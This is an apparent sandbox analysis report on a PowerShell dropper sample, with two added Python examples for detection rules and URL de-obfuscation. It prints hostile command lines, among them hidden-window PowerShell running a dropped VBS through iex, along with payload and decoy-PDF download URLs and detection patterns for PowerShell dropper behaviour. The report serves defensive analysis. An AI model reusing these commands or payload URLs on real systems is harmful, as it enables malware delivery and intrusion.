Windows Analysis Report
8iAcoQLc3o.ps1

Overview

General Information

Sample name: 8iAcoQLc3o.ps1 (renamed because the original name is a hash value)
Original sample name: 7ce5c4a2b61a6d000da4ca3d4e5869a55349d9a03af50d7560b5485fe6e86935.ps1
Analysis ID: 1578224
MD5: 2bd577dc4641703c479a1482dacd6358
SHA1: fc7e7f29396675e92bb998621fa2f6b706b16617
SHA256: 7ce5c4a2b61a6d000da4ca3d4e5869a55349d9a03af50d7560b5485fe6e86935
Tags: 185-236-228-92, 87-120-112-91, ps1, www-al-rasikh-com, user-JAMESWT_MHT

Detection

Score: 84 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 4092 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7348 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 8100 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1660,i,3372118493204985000,18369712110352765169,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 7832 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 7804, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security
Source: amsi64_7804.amsi.csv, Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Author: Joe Security

      System Summary

      Source: Process started, Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7804, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'", ProcessId: 8072, ProcessName: powershell.exe
      Source: File created, Author: Florian Roth (Nextron Systems), Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7804, TargetFilename: C:\Users\Public\dmb.vbs
      Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", ProcessId: 7804, ProcessName: powershell.exe
      Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7804, TargetFilename: C:\Users\Public\dmb.vbs
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", ProcessId: 7804, ProcessName: powershell.exe
      Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7832, ProcessName: svchost.exe
      No Suricata rule has matched
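The Sigma matches above are listed by rule author and event data only; the checks behind them are plain command-line and file-path predicates. The block below is an added example, not Joe Sandbox or Sigma project code, that re-implements those predicates over events transcribed from this report's process tree and Sigma data: an insecure -ExecutionPolicy on the command line, suspicious PowerShell parameter substrings, and a script written by powershell.exe into a suspicious folder. The substring, folder and extension lists are assumed to be a small representative subset of the public rules, not their full content, and the powershell-child-with-iex check is an extra heuristic taken from the shape of the process tree, not a rule named on the page.

```python
import re

PS_EXE = "\\powershell.exe"

# Process-creation events, constructed from the process tree and the Sigma
# "Data:" fields in this report (PIDs, images and command lines as shown there).
PROCESS_EVENTS = [
    {"pid": 7804, "ppid": 3968,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "",
     "cmdline": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                '-noLogo -ExecutionPolicy unrestricted -file "C:\\Users\\user\\Desktop\\8iAcoQLc3o.ps1"'},
    {"pid": 8072, "ppid": 7804,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -win hidden =iex '
                '"[Environment]::GetEnvironmentVariable(\'public\') + \'\\\\hqpoqw.vbs\'"'},
    {"pid": 7832, "ppid": 620,
     "image": "C:\\Windows\\System32\\svchost.exe", "parent_image": "",
     "cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s BITS"},
]

# File-creation events (Sysmon EventID 11 style), constructed from the report.
FILE_EVENTS = [
    {"pid": 7804, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target": "C:\\Users\\Public\\dmb.vbs"},
    {"pid": 7804, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target": "C:\\Users\\user\\Desktop\\List of Required items and services.pdf"},
    {"pid": 7804, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target": "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dluyv2wx.teb.ps1"},
]

# Assumption: a representative subset of the public Sigma rule content, not the
# complete selection lists.
INSECURE_POLICY = re.compile(r"-(?:ex|ep|exec|executionpolicy)\s+(?:unrestricted|bypass)\b", re.I)
SUSPICIOUS_SUBSTRINGS = (" -nop", " -noni", " -w hidden", " -win hidden",
                         " -windowstyle hidden", " -ec ", " -enc ", " -encodedcommand ")
SUSPICIOUS_FOLDERS = ("c:\\users\\public\\", "c:\\windows\\temp\\",
                      "c:\\perflogs\\", "c:\\programdata\\")
DROPPER_EXTENSIONS = {"vbs", "js", "jse", "wsf", "hta", "bat", "cmd", "ps1", "exe", "dll", "scr"}


def _is_powershell(image):
    return image.lower().endswith(PS_EXE)


def check_process(ev):
    """Return the names of the checks a process-creation event trips, in a fixed order."""
    hits = []
    if not _is_powershell(ev["image"]):
        return hits
    cl = " " + ev["cmdline"].lower()   # leading space so " -nop"-style tokens match at offset 0
    if INSECURE_POLICY.search(cl):
        hits.append("insecure_execution_policy")
    if any(s in cl for s in SUSPICIOUS_SUBSTRINGS):
        hits.append("suspicious_parameter_substring")
    # Heuristic from the process tree, not a listed rule: PowerShell spawning a
    # second PowerShell whose command line invokes iex.
    if _is_powershell(ev["parent_image"]) and "iex" in cl:
        hits.append("powershell_child_with_iex")
    return hits


def check_file_create(ev):
    """Return the names of the checks a file-creation event trips, in a fixed order."""
    hits = []
    if not _is_powershell(ev["image"]):
        return hits
    target = ev["target"].lower()
    ext = target.rsplit(".", 1)[-1] if "." in target else ""
    if any(target.startswith(p) for p in SUSPICIOUS_FOLDERS):
        hits.append("script_write_to_suspicious_folder")
    # PowerShell writes its own __PSScriptPolicyTest_*.ps1 probe on every start;
    # excluding it keeps the dropper check from firing on every session.
    if ext in DROPPER_EXTENSIONS and "\\__psscriptpolicytest_" not in target:
        hits.append("script_or_binary_dropper")
    return hits


def evaluate():
    """Run every check over the constructed events; keyed by (kind, pid, target-or-cmdline)."""
    out = {}
    for ev in PROCESS_EVENTS:
        out[("process", ev["pid"])] = check_process(ev)
    for ev in FILE_EVENTS:
        out[("file", ev["pid"], ev["target"])] = check_file_create(ev)
    return out


if __name__ == "__main__":
    for key, hits in evaluate().items():
        print(key, "->", hits or "-")
```

Only the two powershell.exe events and the dmb.vbs write produce findings; svchost.exe, the decoy PDF on the Desktop and PowerShell's own policy-test file stay clean, which is the separation a rule set needs to be deployable.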


      AV Detection

      Source: 8iAcoQLc3o.ps1, Avira: detected
      Source: 8iAcoQLc3o.ps1, Virustotal: Detection: 42%
      Source: 8iAcoQLc3o.ps1, ReversingLabs: Detection: 36%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 94.1% probability
      Source: unknown, HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.10:49718 version: TLS 1.2
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1357601906.0000021EF0D73000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.1590508240.0000028A66A1B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1497120784.0000028A4C5DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb% source: powershell.exe, 00000005.00000002.1590508240.0000028A66A1B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.1590508240.0000028A669F1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: b.pdb_ source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5FF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000005.00000002.1497120784.0000028A4C5DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: gement.Automation.pdbystem.C" source: powershell.exe, 00000008.00000002.1329928980.0000021ED6963000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1353972064.0000021EF09D5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1353620639.0000021EF099B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbIJ source: powershell.exe, 00000005.00000002.1511182185.0000028A4E697000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb` source: powershell.exe, 00000008.00000002.1356025565.0000021EF0C66000.00000004.00000020.00020000.00000000.sdmp
      Source: global traffic, HTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1 | Host: www.astenterprises.com.pk | Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected: GET /ms/ms.vbs HTTP/1.1 | Host: www.bluemaxxlaser.com | Connection: Keep-Alive
      Source: Joe Sandbox View, IP Address: 203.175.174.69
      Source: Joe Sandbox View, IP Address: 107.161.23.150
      Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
      Source: global traffic, DNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global traffic, DNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global traffic, DNS traffic detected: DNS query: x1.i.lencr.org
      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 19 Dec 2024 11:45:15 GMT | Server: Apache | Content-Length: 315 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A503FB000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://astenterprises.com.pk
      Source: powershell.exe, 00000005.00000002.1502142325.0000028A4C845000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.microsoftA
      Source: svchost.exe, 0000000C.00000002.2518391003.00000250DD08D000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.11.dr, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.12.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.12.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.12.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.12.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.12.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.12.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.12.dr, String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED926A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://go.micros
      Source: powershell.exe, 00000005.00000002.1578438045.0000028A5EAB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1578438045.0000028A5E975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4E901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED8831000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A503FB000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4EB32000.00000004.00000800.00020000.00000000.sdmp, 8iAcoQLc3o.ps1, String found in binary or memory: http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A50491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1512088462.0000028A50435000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A50435000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000005.00000002.1511872796.0000028A4E790000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.11.dr, String found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4E901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED8831000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED9E56000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
      Source: edb.log.12.dr, String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
      Source: svchost.exe, 0000000C.00000003.1423876547.00000250DCE00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.dr, String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4F532000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED926A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED9E56000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
      Source: powershell.exe, 00000005.00000002.1578438045.0000028A5EAB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1578438045.0000028A5E975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
      Source: ReaderMessages.10.dr, String found in binary or memory: https://www.adobe.co
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4FF32000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.p
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A503F6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A503F6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4FF32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1512088462.0000028A503F6000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
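Two of the memory strings above are obfuscated forms of the URLs the sandbox then saw on the wire: http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs next to http://www.bluemaxxlaser.com/ms/ms.vbs, and the truncated https://www.astd1dntd1drprisd1ds.com.pk/... next to https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf. The report does not show the script's own decode routine; the block below is an added example, not the sample's code, that assumes the substitution both pairs are consistent with (the token "d1d" standing in for "e"), decodes the strings, and checks the result against the HTTP and DNS observations. The infer_token helper goes a step further than the report and recovers that token from one obfuscated/plain pair, which is the way to confirm the guess before writing it into an IOC extractor.

```python
from urllib.parse import urlsplit

# Assumption inferred from the two string pairs in the report: the script
# replaced every "e" in its URLs with the token "d1d" and reverses it at run time.
TOKEN, PLAIN = "d1d", "e"

# Obfuscated strings exactly as recovered from powershell.exe memory above
# (the second one is truncated in the report and stays truncated here).
OBFUSCATED = [
    "http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs",
    "https://www.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.p",
]

# What the sandbox recorded on the wire (HTTP requests and DNS queries above).
OBSERVED_URLS = [
    "http://www.bluemaxxlaser.com/ms/ms.vbs",
    "https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf",
]
OBSERVED_DNS = {"www.astenterprises.com.pk", "www.bluemaxxlaser.com", "x1.i.lencr.org"}


def deobfuscate(s, token=TOKEN, plain=PLAIN):
    """Undo a fixed-token substitution; a plain str.replace is all the sample needs."""
    return s.replace(token, plain)


def decoded_urls():
    return [deobfuscate(s) for s in OBFUSCATED]


def hosts(urls):
    """Hostnames from a list of URLs, for comparison with the DNS queries seen."""
    return {urlsplit(u).hostname for u in urls}


def matches_observed(decoded, observed):
    """True when every decoded string is a prefix of (or equal to) an observed URL.
    Prefix rather than equality, because memory strings may be truncated."""
    return all(any(o.startswith(d) for o in observed) for d in decoded)


def infer_token(obfuscated, plain, max_len=4):
    """Recover a fixed substitution token from one obfuscated/plain pair: try every
    substring of the obfuscated string up to max_len characters, longest first, and
    return the (token, char) whose replacement reproduces the plain string exactly.
    Returns None when no single-token substitution explains the pair."""
    for n in range(max_len, 0, -1):
        for i in range(len(obfuscated) - n + 1):
            tok = obfuscated[i:i + n]
            for ch in set(plain):
                if obfuscated.replace(tok, ch) == plain:
                    return tok, ch
    return None


if __name__ == "__main__":
    for raw, dec in zip(OBFUSCATED, decoded_urls()):
        print(raw, "->", dec)
    print("consistent with traffic:", matches_observed(decoded_urls(), OBSERVED_URLS))
    print("hosts resolved by DNS:", hosts(decoded_urls()) <= OBSERVED_DNS)
    print("inferred token:", infer_token(OBFUSCATED[0], OBSERVED_URLS[0]))
```

Decoding the memory strings this way gives the same two hosts the DNS section shows being queried, so the obfuscated strings can be treated as the script's download URLs rather than decoys; the truncated PDF string decodes to a prefix of the full URL seen in the GET request.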
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknown, Network traffic detected: HTTP traffic on port 49718 -> 443
      Source: C:\Windows\System32\svchost.exe, File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engine, Classification label: mal84.evad.winPS1@21/61@3/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\Desktop\List of Required items and services.pdf
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dluyv2wx.teb.ps1
